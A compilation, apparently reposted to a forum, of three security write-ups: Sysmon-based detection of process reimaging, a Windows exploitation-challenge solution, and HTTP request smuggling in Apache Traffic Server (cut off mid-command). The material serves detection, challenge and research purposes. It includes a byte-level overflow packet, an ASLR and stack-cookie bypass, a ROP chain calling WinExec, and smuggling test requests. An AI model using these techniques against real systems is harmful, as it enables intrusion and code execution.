When walking through the Technical Deep Dive portion of the blog, this stood out to me: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/ The picture above shows a couple of API calls that particularly piqued my interest: LoadLibrary and CreateProcess. Based on my research inside the Sysmon driver, both of these API calls are funneled through an event registration mechanism.
This mechanism is then called by the Sysmon driver using the requisite Input/Output Control (IOCTL) codes to query the data. The queried data is then pulled back into the Sysmon binary, which produces the correlating Event ID. The correlating processes for both of the API calls above are shown below:

Mapping of Sysmon Event ID 1: Process Creation

Mapping of Sysmon Event ID 7: Image Loaded

Based on this research and the technical deep dive section in the McAfee article, I know exactly what data will be generated when this attack is performed. Sysmon should have an Event ID 7 for each call to LoadLibrary, and an Event ID 1 for the call to CreateProcess. However, how do I turn data into actionable data — data that a threat hunter can easily use and manipulate to suit their needs? To do this, we focus on Data Standardization and Data Quality. Data Quality is derived from Data Standardization. Data Standardization is the process of transforming data into a common readable format that can then be easily analyzed. Data Quality is the process of making sure the environment is collecting the correct data, which can then be rationalized to specific attack techniques. This can be achieved by understanding the behavior of non-malicious data and creating behavioral correlations of the data provided during this attack. For example, when a process is created, the OriginalFileName (a relatively new addition to Sysmon) should match the Image field within Sysmon Event ID 1. Say you want to launch PowerShell: the OriginalFileName will be Powershell.EXE and the Image will be C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. When these two don’t match, that is possibly an indicator of malicious activity. After process reimaging, when an application calls the GetMappedFileName API to retrieve the process image file, Windows will send back the incorrect file path.
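The OriginalFileName/Image consistency check described above can be sketched in a few lines of plain Python. The event dictionaries and the helper name below are invented for illustration; real data would come from the Sysmon event log:

```python
import ntpath  # handles Windows-style paths regardless of host OS

def image_mismatch(event):
    """Flag a Sysmon Event ID 1 record whose OriginalFileName (taken from
    the PE version resource) does not match the file name in the Image
    path; the comparison is case-insensitive, like NTFS paths."""
    image_name = ntpath.basename(event["Image"]).lower()
    return image_name != event["OriginalFileName"].lower()

# Normal PowerShell launch: the two fields agree.
benign = {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "OriginalFileName": "PowerShell.EXE"}

# A dropped binary masquerading under a trusted name: they disagree.
suspect = {"Image": r"C:\Users\victim\phase1.exe",
           "OriginalFileName": "svchost.exe"}

print(image_mismatch(benign), image_mismatch(suspect))  # False True
```

Note the case-insensitive comparison: OriginalFileName values keep whatever casing the PE resource used, so a naive string equality would false-positive on almost everything.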
A correlation can be made between the Image field in Event ID 1 and the ImageLoaded field in Event ID 7. Since Event ID 1 and Event ID 7 both carry the OriginalFileName field, an analyst can execute a JOIN on the data for both events. In this JOIN, the results should show that the path of the process being created equals the Image of the image being loaded. With this correlation, one can determine that the two events belong to the same activity subset. The correlation above follows this portion of the attack:

Function section we are basing detection on: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/

Although a relationship can be made using Sysmon Event ID 1 and Sysmon Event ID 7, another relationship can be made based on the user-mode API NtCreateFile. This call goes through the event registration mechanism FltRegisterFilter, which produces an Event ID 11 — File Creation in Sysmon. This relationship can be correlated on Sysmon Event ID 1’s Image field, which should match Sysmon Event ID 11’s TargetFilename. Sysmon Event ID 1’s ParentProcessGuid should also match Sysmon Event ID 11’s ProcessGuid, to ensure both events are caused by the same process. Now that the research is done, the hypotheses have to be tested.

Data Analytics:

Below is the command for the attack being executed. The process (phase1.exe) was created by loading a binary (svchost.exe), then reimaged as lsass.exe.

.\CSProcessReimagingPOC.exe C:\Windows\System32\svchost.exe C:\Windows\System32\lsass.exe

The following SparkSQL code is the analytic version of what was discussed above: query run utilizing Jupyter Notebooks and SparkSQL (Gist). I tried to make the JOIN functions as readable as possible. One thing to note is that this query pulls from the raw Sysmon data logs; no transformations are performed within a SIEM pipeline.
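The EID 1 / EID 11 correlation can also be sketched without Spark. The records, GUIDs, and paths below are invented stand-ins, but the join condition is the one described above (Image equals TargetFilename, ParentProcessGuid equals the file creator's ProcessGuid):

```python
# Stand-ins for Sysmon Event ID 1 (process creation) and Event ID 11
# (file creation) records; GUIDs and paths are made up for illustration.
eid1_events = [{"ProcessGuid": "{guid-phase1}",
                "ParentProcessGuid": "{guid-dropper}",
                "Image": r"C:\Temp\phase1.exe"}]
eid11_events = [{"ProcessGuid": "{guid-dropper}",
                 "TargetFilename": r"C:\Temp\phase1.exe"}]

def correlate(creations, file_creates):
    """Join EID 1 to EID 11: the dropped file becomes the image of the new
    process, and that file was written by the new process's parent."""
    return [(c["ProcessGuid"], c["Image"])
            for c in creations
            for f in file_creates
            if c["Image"].lower() == f["TargetFilename"].lower()
            and c["ParentProcessGuid"] == f["ProcessGuid"]]

print(correlate(eid1_events, eid11_events))
```

In SparkSQL this is the same inner JOIN, just expressed over the raw Sysmon tables instead of Python lists.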
Below is a visual representation of the joins and data correlations done within Jupyter Notebooks utilizing SparkSQL. The query also checks whether a created file is subsequently moved to a different directory, as well as whether the OriginalFileName of a file doesn’t equal the Image for Sysmon Event ID 1 (e.g. a created process with Image “ApplyTrustOffline.exe” and OriginalFileName “ApplyTrustOffline.PROGRAM”). After these checks, the query will only bring back the results of the reimaging attack.

Graphed View of JOINs in Query

The output of the SQL query above can be seen below. You may find that the query output after the attack seems to contain “duplicates” of the events. This isn’t the case: each time the attack is run, a Sysmon Event ID 11 — FileCreate fires after each Sysmon Event ID 1 — Process Creation. This correlates with the behavior of the attack discussed above.

Query Output

The dataset and Jupyter Notebook that correlate with the following analysis are available on my GitHub. I encourage anyone to pull them down and analyze the data for themselves. If you don’t have a lab to test in, one can be found here: https://github.com/jsecurity101/mordor/tree/master/environment/shire/aws. Below, the stages and the details of the dataset that was run are broken down; this correlates with the query that was run above. One thing to keep in mind: when the malicious binary is reimaged to the binary of the adversary’s choosing (stage 3), you will not see that “phase1.exe” was reimaged to “lsass.exe”. This is the behavior of the attack; Windows will send back the improper file object. This doesn’t debunk the detection. The goal is to discover the behavior of the attack, and once that is done you can either follow the ProcessGuid of “phase1.exe” or go to its full path to find the Image of the binary it was reimaged with. “Phase1.exe” will appear under the context of that reimaged binary.
Image of the properties of phase1.exe after reimaging is executed

Conclusion:

Process Reimaging really piqued my interest, as it is focused on flying under the radar to avoid detection. Each technique an attacker leverages will generate data that follows the behavior of the attack. This can be leveraged, but only once we understand our data and data sources. Moving away from signature-based hunts toward a data-driven hunt methodology will help with the robustness of detections.

Thank You: Huge thank you to Matt Graeber for helping me with the reverse engineering process of the Sysmon driver; to Dwight Hohnstein for his POC code; and lastly to Brian Reitz for helping when SQL wasn’t behaving.

References/Resources: In NTDLL I Trust — Process Reimaging and Endpoint Security Solution Bypass; Dwight’s Process Reimaging POC; Microsoft Docs

Written by Jonathan Johnson — Posts By SpecterOps Team Members: posts from SpecterOps team members on various topics relating to information security. Sursa: https://posts.specterops.io/you-can-run-but-you-cant-hide-detecting-process-reimaging-behavior-e6bb9a10c40b
  19. 1 point
Writeup for the BFS Exploitation Challenge 2019

Table of Contents: Introduction; TL;DR; Initial Dynamic Analysis; Statically Identifying the Vulnerability; Strategy; Preparing the Exploit; Building a ROP Chain; See Exploit in Action; Contact

Introduction

Having enjoyed and succeeded in solving a previous BFS Exploitation Challenge from 2017, I decided to give the 2019 BFS Exploitation Challenge a try. It is a Windows 64-bit executable for which an exploit is expected to work on a Windows 10 Redstone machine. The challenge’s goals were set to: bypass ASLR remotely; achieve arbitrary code execution (pop calc or notepad); have the exploited process properly continue its execution.

TL;DR: Spare me all the boring details — I want to grab a copy of the challenge, study the decompiled code, study the exploit.

Initial Dynamic Analysis

Running the file named ‘eko2019.exe’ opens a console application that seemingly waits for and accepts incoming connections from (remote) network clients. Quickly checking the running process’s security features using Sysinternals Process Explorer shows that DEP and ASLR are enabled, but Control Flow Guard is not. Good. Further examining the running process dynamically using tools such as Sysinternals TCPView, Process Monitor, or simply running netstat could have been an option right now, but personally I prefer diving directly into the code using my static analysis tool of choice, IDA Pro (I recommend following along with your favourite disassembler/decompiler).

Statically Identifying the Vulnerability

Having disassembled the executable file and looking at the list of identified functions, the maximum number of functions that needed to be analyzed for weaknesses was as little as 17 out of 188 in total — the remaining ones being known library functions, imported functions, and the main() function itself.
Navigating to and running the disassembled code's main() function through the Hex-Rays decompiler and putting some additional effort into renaming functions, variables and annotating the code resulted in the following output: By looking at the code and annotations shown in the screenshot above, we can see there is a call to a function in line 19 which creates a listening socket on TCP port 54321, shortly followed by a call to accept() in line 27. The socket handle returned by accept() is then passed as an argument to a function handle_client() in line 36. Keeping in mind the goals of this challenge, this is probably where the party is going to happen, so let's have a look at it. As an attacker, what we are going to look for and concentrate on are functions within the server's executable code that process any kind of input that is controlled client-side. All with the goal in mind of identifying faulty program logic that hopefully can be taken advantage of by us. In this case, it is the two calls to the recv() function in lines 21 and 30 in the screenshot above which are responsible for receiving data from a remote network client. The first call to recv() in line 21 receives a hard-coded number of 16 bytes into a "header" structure. It consists of three distinct fields, of which the first one at offset 0 is "magic", a second at offset 8 is "size_payload" and the third is unused. By accessing the "magic" field in line 25 and comparing it to a constant value "Eko2019", the server ensures basic protocol compatibility between connected clients and the server. Any client packet that fails in complying with this magic constant as part of the "header" packet is denied further processing as a consequence. By comparing the "size_payload" field of the "header" structure to a constant value in line 27, the server limits the field's maximum allowed value to 512. This is to ensure that a subsequent call to recv() in line 30 receives a maximum number of 512 bytes in total. 
Doing so prevents the destination buffer "buf" from being written to beyond its maximum size of 512 bytes - too bad! If this sanity check wasn't present, it would have allowed us to overwrite anything that follows the "buf" buffer, including the return address to main() on the stack. Overwriting the saved return address could have resulted in straightforward and reliable code execution. Skimming through this function's remaining code (and also through all the other remaining functions) doesn't reveal any more code that'd process client-side input in any obviously dangerous way, either. So we must probably have overlooked something and -yes you guessed it- it's in the processing of the "pkthdr" structure. A useful pointer to what the problem could be is provided by the hint window that appears as soon as the mouse is hovered over the comparison operator in line 27. As it turns out, it is a signed integer comparison, which means the size restriction of 512 can successfully be bypassed by providing a negative number along with the header packet in "size_payload"! Looking further down the code at line 30, the "size_payload" variable is typecast to a 16 bit integer type as indicated by the decompiler's LOWORD() macro. Typecasting the 32 bit "size_payload" variable to a 16 bit integer effectively cuts off its upper 16 bits before it is passed as a size argument to recv(). This enables an attacker to cause the server to accept payload data with a size of up to 65535 bytes in total. Sending the server a respectively crafted packet effectively bypasses the intended size restriction of 512 bytes and successfully overwrites the "buf" variable on the stack beyond its intended limits. 
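The combination of signed comparison and LOWORD() truncation can be reproduced in a few lines of Python. This is a sketch of the server-side logic as described above; the constant and function names are mine:

```python
import struct

SIZE_LIMIT = 512

def server_size_check(size_payload):
    """Mimic the flawed server logic: a signed 32-bit comparison (the
    'jle') followed by a 16-bit LOWORD() truncation of the size that is
    actually passed to recv()."""
    # Reinterpret the 32-bit value as signed, the way the CPU compares it.
    signed = struct.unpack('<i', struct.pack('<I', size_payload & 0xFFFFFFFF))[0]
    if signed > SIZE_LIMIT:
        return None                 # honest oversized requests are rejected
    return size_payload & 0xFFFF    # LOWORD(): what recv() actually gets

print(server_size_check(1024))        # honest size: rejected -> None
print(server_size_check(0xFFFF0400))  # negative as signed, LOWORD is 1024
```

A size field of 0xFFFF0400 is -64512 when viewed as a signed 32-bit integer, so it sails past the `<= 512` check, while its lower 16 bits (0x0400 = 1024) become the length handed to recv().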
If we wanted to verify the decompiler’s results, or if we refrained from using a decompiler entirely because we preferred sharpening or refreshing our assembly comprehension skills instead, we could just as well have a look at the assembler code:

the “jle” instruction indicates a signed integer comparison

the “movzx eax, word ptr...” instruction moves 16 bits of data from the data source into the 32-bit register eax, zero-extending its upper 16 bits

Alright, before we can start exploiting this vulnerability and take control of the server process’s instruction pointer, we need to find a way to bypass ASLR remotely. Also, by checking out the handle_client() function’s prologue in the disassembly, we can see there is a stack cookie that will be checked by the function’s epilogue, which eventually needs to be taken care of.

Strategy

In order to bypass ASLR, we need to cause the server to leak an address that belongs to its process space. Fortunately, there is a call to the send() function in line 45, which sends 8 bytes of data — exactly the size of a pointer in 64-bit land. That should serve our purpose just fine. These 8 bytes of data are stored in a _QWORD variable “gadget_buf” as the result of a call to the exec_gadget() function in line 44. Going further up the code to line 43, we can see self-modifying code that uses the WriteProcessMemory() API function to patch the exec_gadget() function with whatever data “gadget_buf” contains. The “gadget_buf” variable in turn is the result of a call to the copy_gadget() function in line 41, which is passed the address of a global variable “g_gadget_array” as an argument. Looking at the copy_gadget() function’s decompiled code reveals that it takes an integer argument, swaps its endianness, and returns the result to the caller. In summary, whatever 8 bytes “g_gadget_array” at position “gadget_idx % 256” points to will be executed by the call to exec_gadget(), and the result is then sent back to the connected client.
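Based on the description above, copy_gadget()'s byte swap can be modeled in a one-liner — a sketch, not the challenge's actual code:

```python
import struct

def swap_endianness64(value):
    """Reinterpret a 64-bit integer with its byte order reversed: pack it
    big-endian, read it back little-endian (the operation is symmetric)."""
    return struct.unpack('<Q', struct.pack('>Q', value))[0]

x = 0x0102030405060708
print(hex(swap_endianness64(x)))                     # 0x807060504030201
assert swap_endianness64(swap_endianness64(x)) == x  # swapping twice is identity
```

This matters for the attack because the 8 bytes the server ends up executing are the byte-reversed form of whatever g_gadget_array holds at the chosen index.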
Looking at the cross references to “g_gadget_array”, which is only initialized at run-time, we can find a for loop that initializes its 256 elements as part of the server’s main() function. Going back to the handle_client() function, we find that the “gadget_idx” variable is initialized with 62, which means the gadget pointed to by “p_gadget_array[62]” is executed by default. The strategy is to get control of the “gadget_idx” variable. Luckily, it is a stack variable adjacent to the “buf[512]” variable, and thus can be written to by sending the server data that exceeds the “buf” variable’s maximum size of 512 bytes. Having “gadget_idx” under control allows us to have the server execute a gadget other than the default one at index 62 (0x3e). In order to find a reasonable gadget in the first place, I wrote a little Python script that mimics the server’s initialization of “g_gadget_array” and then disassembles all its 256 elements using the Capstone Engine Python bindings. I spent quite some time reading the resulting list of gadgets, trying to find a suitable gadget for leaking a qualified pointer from the running process, but with only partial success. Knowing I must have been missing something, I still settled for a gadget that would leak only the lower 32 bits of a 64-bit pointer, for the sake of progressing and fixing it later. Using this gadget would modify the pointer passed to the call to exec_gadget(), making it point to a location other than what the “p” pointer usually points to, which could then be used to leak further data. Working around some limitations by hard-coding stuff, I still managed to develop quite a stable exploit, including full process continuation. But it was only after a kind soul asked me whether I hadn’t thought of reading from the TEB that I got on the right track to writing an exploit that is more than just “quite” stable.
Thank you!

Preparing the Exploit

The TEB holds vital information that can be used for bypassing ASLR, and it is accessed via the gs segment register on 64-bit Windows systems. Looking through the list of gadgets for any occurrence of “gs:” yields a single hit, at index 0x65 of the “g_gadget_array” pointer. Acquiring the current thread’s TEB address is possible by reading from gs:[030h]. In order to have the gadget shown in the screenshot above do so, the rcx register must first be set to 0x30. The rcx register is the first argument to the exec_gadget() function, which is loaded from the “p” variable on the stack. Like the “gadget_idx” variable, “p” is adjacent to the overflowable buffer, hence overwritable as well. Great. By sending a particularly crafted sequence of network packets, we are now given the ability to leak arbitrary data from the server thread’s TEB structure. For example, by sending the following packet to the server, gadget number 0x65 will be called with rcx set to 0x30:

[0x200*'A'] + ['\x65\x00\x00\x00\x00\x00\x00\x00'] + ['\x30\x00\x00\x00\x00\x00\x00\x00']

Sending this packet will overwrite the target thread’s following variables on the stack and will cause the server to send us the current thread’s TEB address:

[buf] + [gadget_idx] + [p]

The following screenshot shows the Python implementation of the leak_teb() function used by the exploit. With the process’s TEB address leaked to us, we are well prepared for leaking further information using the default gadget 62 (0x3e), which dereferences arbitrary 64 bits of process memory pointed to by rcx per request. In turn, leaking arbitrary memory allows us to:

bypass DEP and ASLR

identify the stack cookie’s position on the stack

leak the stack cookie

locate ourselves on the stack

eventually run an external process

In order to bypass ASLR, the “ImageBaseAddress” of the target executable must be acquired from the Process Environment Block, which is accessible at gs:[060h].
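A sketch of how such a leak packet could be assembled in Python: the general layout (8-byte magic, 32-bit size, 4 unused bytes, then the overflowing payload) follows the write-up, but the exact on-wire form of the magic and the null padding are my assumptions:

```python
import struct

MAGIC = b"Eko2019\x00"   # assumed 8-byte on-wire form of the magic value
BUF_SIZE = 0x200         # the 512-byte "buf" on the stack

def build_leak_packet(gadget_idx, p_value):
    """Overflow 'buf' just enough to overwrite the adjacent 'gadget_idx'
    and 'p' stack variables. The header advertises a size whose signed
    32-bit value is negative (passing the length check) while its LOWORD
    equals the real payload length."""
    payload = b"A" * BUF_SIZE
    payload += struct.pack("<Q", gadget_idx)  # lands on gadget_idx
    payload += struct.pack("<Q", p_value)     # lands on p (becomes rcx)
    size_field = 0xFFFF0000 | len(payload)    # negative signed, LOWORD intact
    header = MAGIC + struct.pack("<I", size_field) + b"\x00" * 4
    return header + payload

pkt = build_leak_packet(0x65, 0x30)  # gadget 0x65 reads gs:[rcx] -> TEB
print(len(pkt))                      # 16-byte header + 528-byte payload
```

Swapping the two trailing qwords changes which gadget runs and what rcx points at, which is all the primitive the rest of the exploit needs.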
This will allow for relative addressing of the individual ROP gadgets and is required for building a ROP chain that bypasses Data Execution Prevention. Based on the executable’s in-memory “ImageBaseAddress”, the address of the WinExec() API function, as well as the stack cookie’s xor key, can be leaked. What’s still missing is a way of acquiring the stack cookie from the current thread’s stack frame. Although I knew the approach was faulty, I had initially leaked the cookie by abusing the fact that there exists a reliable pointer to the formatted text created by any preceding call to the printf() function. By sending the server a packet that solely consisted of printable characters, with a size that would overflow the entire stack frame but stop right before the stack cookie’s position, the call to printf() would leak the stack cookie from the stack into the buffer holding the formatted text, whose address had previously been acquired. While this might have been an interesting approach, it is error-prone: if the cookie contained any null bytes right in the middle, the call to printf() would make only a partial copy of the cookie, which would have made the exploit unreliable. Instead, I decided to leak both “StackBase” and “StackLimit” from the TIB, which is part of the TEB, and walk the entire stack, starting from StackLimit, looking for the first occurrence of the saved return address to main(). Relative to that location, the cookie belonging to the handle_client() function’s stack frame can be addressed and subsequently leaked to our client. Having a copy of the cookie and a copy of the xor key at hand allows the rsp register to be recovered, which can then be used to build the final ROP chain.

Building a ROP Chain

Now that we know how to leak all the information required for building a fully working exploit from the vulnerable process, we can build a ROP chain and have it cause the server to pop calc.
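The cookie/rsp relationship used above is the usual MSVC /GS scheme, where the value stored in a frame is that frame's rsp XORed with the process-wide cookie key. With toy stand-in numbers:

```python
# Toy values standing in for the leaked quantities. Under the /GS scheme,
# stored_cookie = rsp ^ xor_key, so XORing the leaked cookie with the
# leaked key recovers the frame's stack pointer.
xor_key = 0x00002B992DDFA232   # stand-in for the leaked cookie key
rsp = 0x000000D7F54FF8A0       # the value we ultimately want to recover

stored_cookie = rsp ^ xor_key  # what the stack walk finds in the frame
recovered = stored_cookie ^ xor_key
print(recovered == rsp)  # True
```

That recovered rsp is what anchors the chain: it tells us where "buf", "entry_point" at offset 0x230, and "ptr_to_chain" at offset 0x228 actually live.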
Using ROPgadget, a list of gadgets was created which was then used to craft the following chain:

1. The ROP chain starts at “entry_point”, located at offset 0x230 of the vulnerable function’s “buf” variable, which previously contained the original return address to main(). It loads “ptr_to_chain” at offset 0x228 into the rsp register, which effectively lets rsp point into the next gadget at 2.). Stack pivoting is a vital step to avoid trashing the caller’s stack frame; messing up the caller’s frame would risk stable process continuation.
2. This gadget loads the address of a “pop rax” gadget into r12, in preparation for a “workaround” required to compensate for the return address pushed onto the stack by the call r12 instruction in 4.).
3. A pointer to “buf” is loaded into rax, which now points to the “calc\0” string.
4. The pointer to “calc\0” is copied to rcx, the first argument for the subsequent API call to WinExec() in 5.). The call to r12 pushes a return address onto the stack and causes the “pop rax” gadget to be executed, which pops that address off the stack again.
5. This gadget causes the WinExec() API function to be called.
6. The call to WinExec() happens to overwrite some of our ROP chain on the stack, hence the stack pointer is adjusted by this gadget to skip the data “corrupted” by the call to WinExec().
7. The original return address to main()+0x14a is loaded into rax.
8. rbx is loaded with the address of “entry_point”.
9. The original return address to main()+0x14a is restored by patching “entry_point” on the stack -> “mov qword ptr [entry_point], main+0x14a”. After that, rsp is adjusted, followed by a few dummy bytes.
10. rsp is adjusted so it will slowly slide into its old position at offset 0x230 of “buf”, in order to return to main() and guarantee process continuation.
11. see 10.)
12. see 10.)
13. see 10.)

See Exploit in Action

Contact: Twitter

Sursa: https://github.com/patois/BFS2019
  20. 1 point
Security: HTTP Smuggling, Apache Traffic Server

Sept 17, 2019 — English — security details of CVE-2018-8004 (August 2018, Apache Traffic Server).

What is this about?
Apache Traffic Server?
Fixed versions of ATS
CVE-2018-8004
Step by step Proof of Concept
Set-up the lab: Docker instances
Test That Everything Works
Request Splitting by Double Content-Length
Request Splitting by NULL Character Injection
Request Splitting using Huge Header, Early End-Of-Query
Cache Poisoning using Incomplete Queries and Bad Separator Prefix
Attack schema
HTTP Response Splitting: Content-Length Ignored on Cache Hit
Attack schema
Timeline
See also

English version (French version available on makina corpus). Estimated read time: 15 min, realistically more.

What is this about?

This article gives a deep explanation of the HTTP Smuggling issues present in CVE-2018-8004. Firstly because there is currently not much information about it (“Undergoing Analysis” at the time of this writing on the previous link). Secondly because some time has passed since the official announcement (and even more since the availability of fixes in v7), and mostly because I keep receiving questions on what exactly HTTP Smuggling is and how to test/exploit this type of issue — and because Smuggling issues are now trending and easier to test thanks to the great work of James Kettle (@albinowax). So, this time, I’ll give you not only details but also a step-by-step demo with some Dockerfiles so you can build your own test lab. You can use that test lab to experiment with manual raw queries, or to test the recently added Burp Suite Smuggling tools. I’m really a big proponent of always searching for Smuggling issues in non-production environments, for legal reasons and also to avoid unintended consequences (and we’ll see in this article, with the last issue, that unintended behaviors can always happen).

Apache Traffic Server?

Apache Traffic Server, or ATS, is an open source HTTP load balancer and reverse proxy cache.
It is based on a commercial product donated to the Apache Foundation. It’s not related to the Apache httpd HTTP server; the “Apache” name comes from the Apache Foundation, and the code is very different from httpd’s. If you were to search for ATS installations in the wild you would find some, hopefully fixed by now.

Fixed versions of ATS

As stated in the CVE announcement (2018-08-28), impacted ATS versions are 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. Version 7.1.4 was released on 2018-08-02 and 6.2.3 on 2018-08-04. That’s the official announcement, but I think 7.1.3 already contained most of the fixes, and is maybe not vulnerable. The announcement was mostly delayed for the 6.x backports (and some other fixes were released at the same time, for other issues). If you wonder about previous versions, like 5.x: they’re out of support, and quite certainly vulnerable. Do not use out-of-support versions.

CVE-2018-8004

The official CVE description is:

There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with ATS.

Which does not give a lot of pointers, but there’s much more information in the 4 pull requests listed:

#3192: Return 400 if there is whitespace after the field name and before the colon
#3201: Close the connection when returning a 400 error response
#3231: Validate Content-Length headers for incoming requests
#3251: Drain the request body if there is a cache hit

If you have already studied some of my previous posts, some of these sentences might already seem dubious. For example, not closing the response stream after a 400 error is clearly a fault based on the standards, but it is also a good catch for an attacker: chances are that by crafting a chain of bad messages you may succeed in receiving a response for some queries hidden in the body of an invalid request. The last one, “Drain the request body if there is a cache hit”, is the nicest one, as we will see in this article, and it was hard to detect.
My original report listed 5 issues:

HTTP request splitting using a NULL character in a header value
HTTP request splitting using a huge header size
HTTP request splitting using double Content-Length headers
HTTP cache poisoning using an extra space before the separator of header name and header value
HTTP request splitting using ... (no spoiler: I keep that for the end)

Step by step Proof of Concept

To understand the issues and see the effects, we will be using a demonstration/research environment. If you want to test HTTP Smuggling issues you should really, really try to test them in a controlled environment. Testing issues on live environments would be difficult because:

You may have some very good HTTP agents (load balancers, SSL terminators, security filters) between you and your target, hiding most of your successes and errors.

You may trigger errors and behaviors that you have no idea about. For example, I have encountered random, unreproducible errors on several fuzzing tests (on test environments) before understanding that they were related to the last smuggling issue we will study in this article. Effects were delayed across subsequent tests, and I was not in control at all.

You may trigger errors on requests sent by other users, and/or for other domains. That’s not like testing a self-reflected XSS; you could end up in court for that.

Real-life complete examples usually occur with interactions between several different HTTP agents, like Nginx + Varnish, or ATS + HaProxy, or Pound + IIS + Node.js, etc. You will have to understand how each actor interacts with the others, and you will see it faster with a local low-level network capture than blindly across an unknown chain of agents (which also helps you learn how to detect each agent in such a chain). So it’s very important to be able to rebuild a laboratory environment.
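As a taste of what the double Content-Length issue looks like on the wire, here is an illustrative probe — my own construction, not taken from the report. If a front-end honors the first header and a back-end honors the second, the trailing bytes are parsed by the back-end as a second, smuggled request:

```python
# Two conflicting Content-Length headers in one query; the second value
# (55) covers the smuggled request hidden in the body.
probe = (b"GET / HTTP/1.1\r\n"
         b"Host: dummy-host7.example.com\r\n"
         b"Content-Length: 0\r\n"
         b"Content-Length: 55\r\n"
         b"\r\n"
         b"GET /hidden HTTP/1.1\r\n"
         b"Host: dummy-host7.example.com\r\n"
         b"\r\n")

body = probe.split(b"\r\n\r\n", 1)[1]
print(len(body))  # must match the second Content-Length header
```

RFC 7230 requires agents to reject messages with conflicting Content-Length values; smuggling happens precisely when one hop in the chain doesn't.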
And, if you find something, this environment can then be used to send detailed bug reports to the program owners (in my own experience, it can sometimes be quite difficult to explain the issues; a working demo helps).

Set-up the lab: Docker instances

We will run two Apache Traffic Server instances, one in version 6.x and one in version 7.x. To add some variety, and potential smuggling issues, we will also add an Nginx docker and an HaProxy one. Four HTTP actors, each one on a local port:

8001: HaProxy (internally listening on port 80)
8002: Nginx (internally listening on port 80)
8007: ATS7 (internally listening on port 8080)
8006: ATS6 (internally listening on port 8080)

Most examples will use ATS7, but you will be able to test the older version simply by using port 8006 instead (and altering the domain). We will chain some reverse proxy relations: Nginx will be the final backend, HaProxy the front load balancer, and between Nginx and HaProxy we will go through ATS6 or ATS7 based on the domain name used (dummy-host7.example.com for ATS7 and dummy-host6.example.com for ATS6). Note that the localhost port mappings of the ATS and Nginx instances are not directly needed: if you can inject a request into HaProxy it will reach Nginx internally, via port 8080 of one of the ATS instances and port 80 of Nginx. But they can be useful if you want to target one of the servers directly, and we will have to avoid the HaProxy part in most examples, because most attacks would be blocked by this load balancer. So most examples will directly target the ATS7 server first, on port 8007. Later you can try to succeed while targeting port 8001; that will be harder.
                  +---[80]---+
                  | 8001->80 |
                  | HaProxy  |
                  |          |
                  +--+---+---+
[dummy-host6.example.com] |   | [dummy-host7.example.com]
          +---------------+   +--------+
          |                            |
   +-[8080]-----+               +-[8080]-----+
   | 8006->8080 |               | 8007->8080 |
   |    ATS6    |               |    ATS7    |
   |            |               |            |
   +-----+------+               +----+-------+
         |                           |
         +------------+--------------+
                      |
                 +--[80]----+
                 | 8002->80 |
                 |  Nginx   |
                 |          |
                 +----------+

To build this cluster we will use docker-compose. You can find the docker-compose.yml file here, but the content is quite short:

version: '3'

services:
  haproxy:
    image: haproxy:1.6
    build:
      context: .
      dockerfile: Dockerfile-haproxy
    expose:
      - 80
    ports:
      - "8001:80"
    links:
      - ats7:linkedats7.net
      - ats6:linkedats6.net
    depends_on:
      - ats7
      - ats6
  ats7:
    image: centos:7
    build:
      context: .
      dockerfile: Dockerfile-ats7
    expose:
      - 8080
    ports:
      - "8007:8080"
    depends_on:
      - nginx
    links:
      - nginx:linkednginx.net
  ats6:
    image: centos:7
    build:
      context: .
      dockerfile: Dockerfile-ats6
    expose:
      - 8080
    ports:
      - "8006:8080"
    depends_on:
      - nginx
    links:
      - nginx:linkednginx.net
  nginx:
    image: nginx:latest
    build:
      context: .
      dockerfile: Dockerfile-nginx
    expose:
      - 80
    ports:
      - "8002:80"

To make this work you will also need the 4 specific Dockerfiles:

Dockerfile-haproxy: an HaProxy Dockerfile, with the right conf
Dockerfile-nginx: a very simple Nginx Dockerfile with one index.html page
Dockerfile-ats7: an ATS 7.1.1 compiled-from-archive Dockerfile
Dockerfile-ats6: an ATS 6.2.2 compiled-from-archive Dockerfile

Put all these files (the docker-compose.yml and the Dockerfile-* files) into a working directory and run in this dir:

docker-compose build && docker-compose up

You can now take a big break; you are launching two compilations of ATS. Hopefully the next time a simple up will be enough, and even the build may not redo the compilation steps. You can easily add another ats7-fixed element to the cluster, to test a fixed version of ATS if you want. For now we will concentrate on detecting issues in the flawed versions.
Test That Everything Works

We will run basic non-attacking queries on this installation, to check that everything is working, and to train ourselves on the printf + netcat way of running queries. We will not use curl or wget to run the HTTP queries, because it would be impossible to write bad queries with them. So we need to use low-level string manipulation (with printf for example) and socket handling (with netcat -- or nc --).

Test Nginx (that's a one-liner split for readability):

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc localhost 8002

You should get the index.html response, something like:

HTTP/1.1 200 OK
Server: nginx/1.15.5
Date: Fri, 26 Oct 2018 15:28:20 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
Connection: keep-alive
ETag: "5bd321bc-78"
X-Location-echo: /
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Then test ATS7 and ATS6:

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc localhost 8007

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc localhost 8006

Then test HaProxy; altering the Host name should make the query transit via ATS7 or ATS6 (check the Server: header in the response):

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc localhost 8001

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc localhost 8001

And now let's start with more complex HTTP stuff: we will make an HTTP pipeline, pipelining several queries and receiving several responses, as pipelining is the root of most smuggling attacks:

# send one pipelined chain of queries
printf 'GET /?cache=1 HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
